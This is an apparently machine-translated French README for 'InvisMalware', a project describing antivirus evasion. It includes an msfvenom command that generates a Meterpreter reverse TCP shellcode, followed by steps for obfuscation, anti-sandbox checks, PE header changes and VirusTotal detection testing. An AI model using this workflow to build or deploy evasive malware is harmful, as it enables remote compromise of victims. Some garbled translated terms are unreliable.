Invismalware: Techniques d'évasion des logiciels malveillants avancés
Table des matières
- Introduction
- Caractéristiques
- Installation
- Usage
- Méthodologie d'expérience
- Essai
- Contributif
- Licence
Introduction
Invismalware est un projet conçu pour démontrer des techniques d'évasion de logiciels malveillants avancées qui contournent la détection des antivirus. Cette expérience de logiciels malveillants axée sur la recherche se concentre sur l'utilisation de méthodes d'obscurcissement, telles que les modifications du code et les stratégies anti-sandbox, pour échapper à la détection de logiciels malveillants statique et dynamique.
Ce projet est à des fins éducatives uniquement, destinées à fournir des informations sur les stratégies de défense des logiciels malveillants modernes en apprenant des techniques d'évasion utilisées par les acteurs malveillants.
Caractéristiques
- Génération de shellcode : créez des charges utiles de shell TCP inverses personnalisées à l'aide de msfvenom.
- Obfuscation du code : Modifiez le code de logiciels malveillants pour échapper à la détection des antivirus en ajoutant des NOP, en manipulant les en-têtes PE, etc.
- Analyse anti-dynamique : inclure des vérifications pour détecter les environnements de bac à sable tels que le pilote audio et la présence de périphérique USB.
- Manipulation de l'en-tête PE : déguisez les logiciels malveillants en peaufinant l'en-tête exécutable portable (PE) pour éviter la détection basée sur la signature.
- Calcul du taux d'évasion : mesurez l'efficacité des techniques d'évasion en comparant les résultats à travers divers moteurs antivirus.
Installation
Pour commencer, clonez le référentiel et installez les dépendances nécessaires.
Condition préalable
- Python 3.x
- VirtualBox / VMware (pour les tests dans des environnements virtuels)
- Metasploit Framework (pour générer ShellCode)
- PE-Bear (pour la manipulation de l'en-tête PE)
Cloner le référentiel
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware
Installer des dépendances
pip install -r requirements.txt
Usage
1. Générer un code de shell de logiciels malveillants
Utilisez MSFvenom pour générer un code Shell TCP inversé:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c
2. Modifier le code shell
Modifiez le fichier evilexp.c pour obscurcir le code et éviter la détection.
3. Exécutez en machine virtuelle
Déployez le malware dans une machine virtuelle isolée sécurisée pour tester son comportement et mesurer les taux de détection.
4. Téléchargez sur Virustotal
Téléchargez vos logiciels malveillants sur Virustotal pour évaluer son taux d'évasion sur plusieurs moteurs antivirus.
Méthodologie d'expérience
Le projet suit une méthodologie en quatre étapes pour réaliser l'évasion des logiciels malveillants:
- ShellCode Génération : Créez un shellcode inversé de base.
- Modification du code : Obincatez le code shell pour échapper à la détection.
- Analyse anti-dynamique : ajouter une détection de bac à sable aux outils d'analyse dynamique de contournement.
- Modification de l'en-tête PE : modifiez l'en-tête PE pour obscurcir davantage la signature de logiciels malveillants.
Essai
Tests locaux
Exécutez le malware sur votre machine virtuelle équipée de logiciels antivirus tels que Kaspersky , Windows Defender ou Bitdefender .
Test de Virustotal
Téléchargez les logiciels malveillants modifiés sur Virustotal et vérifiez combien de moteurs antivirus le détectent avec succès.
Contributif
Nous accueillons des contributions pour améliorer le projet. Si vous souhaitez contribuer:
- Fourk le référentiel.
- Créez une nouvelle branche pour votre fonctionnalité ou votre correction de bogue.
- Soumettez une demande de traction avec des informations détaillées sur vos modifications.
Licence
Ce projet est autorisé sous la licence du MIT. Voir le fichier de licence pour plus de détails.